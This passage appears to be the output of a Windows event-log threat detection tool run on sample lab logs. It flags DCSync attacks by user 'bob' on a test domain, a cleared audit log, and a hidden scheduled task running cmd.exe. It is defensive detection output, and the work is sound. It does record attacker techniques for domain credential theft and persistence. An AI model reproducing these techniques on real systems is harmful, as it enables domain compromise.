;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14675 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242593 + + + + + Security + DC1.insecurebank.local + + + + + 57DCCD4C-7381-4371-8480-D74D47019AD8 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14674 + +",DC1.insecurebank.local,Security +schedule task created,1553508330.695604,2019-03-19T04:02:04.335561+04:00,,Audit,High,schedule task created by user,4698," + + + + + 4698 + 0 + 0 + 12804 + 0 + 0x8020000000000000 + + + 566836 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x17e2d2 + \CYAlyNSS + <?xml version="1.0" encoding="UTF-16"?> +<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> + <Triggers> + <CalendarTrigger> + <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary> + <Enabled>true</Enabled> + <ScheduleByDay> + <DaysInterval>1</DaysInterval> + </ScheduleByDay> + </CalendarTrigger> + </Triggers> + <Principals> + <Principal id="LocalSystem"> + <UserId>S-1-5-18</UserId> + <RunLevel>HighestAvailable</RunLevel> + <LogonType>InteractiveToken</LogonType> + </Principal> + </Principals> + <Settings> + <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> + <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> + <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> + <AllowHardTerminate>true</AllowHardTerminate> + <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> + <IdleSettings> + <StopOnIdleEnd>true</StopOnIdleEnd> + <RestartOnIdle>false</RestartOnIdle> + </IdleSettings> + <AllowStartOnDemand>true</AllowStartOnDemand> + <Enabled>true</Enabled> + <Hidden>true</Hidden> + <RunOnlyIfIdle>false</RunOnlyIfIdle> + <WakeToRun>false</WakeToRun> + <ExecutionTimeLimit>P3D</ExecutionTimeLimit> + <Priority>7</Priority> + </Settings> + <Actions Context="LocalSystem"> + <Exec> + <Command>cmd.exe</Command> + <Arguments>/C tasklist &gt; %windir%\Temp\CYAlyNSS.tmp 2&gt;&amp;1</Arguments> + </Exec> + </Actions> +</Task> + +",WIN-77LTAPHIQ1R.example.corp,Security +Audit log cleared,1552953724.335561,2019-03-25T14:05:30.695604+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 198238040 + + + + + Security + DC1.insecurebank.local + + + + + + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x8d7099 + + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242592 + + + + + Security + DC1.insecurebank.local + + + + + 57DCCD4C-7381-4371-8480-D74D47019AD8 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14675 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242591 + + + + + Security + DC1.insecurebank.local + + + + + A1AA38AA-447E-46C2-ABA0-D205D4D8F873 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14674 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242590 + + + + + Security + DC1.insecurebank.local + + + + + A1AA38AA-447E-46C2-ABA0-D205D4D8F873 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14675 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242589 + + + + + Security + DC1.insecurebank.local + + + + + 2EA9670C-F0F9-4D3F-90E5-A087E8C05863 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f7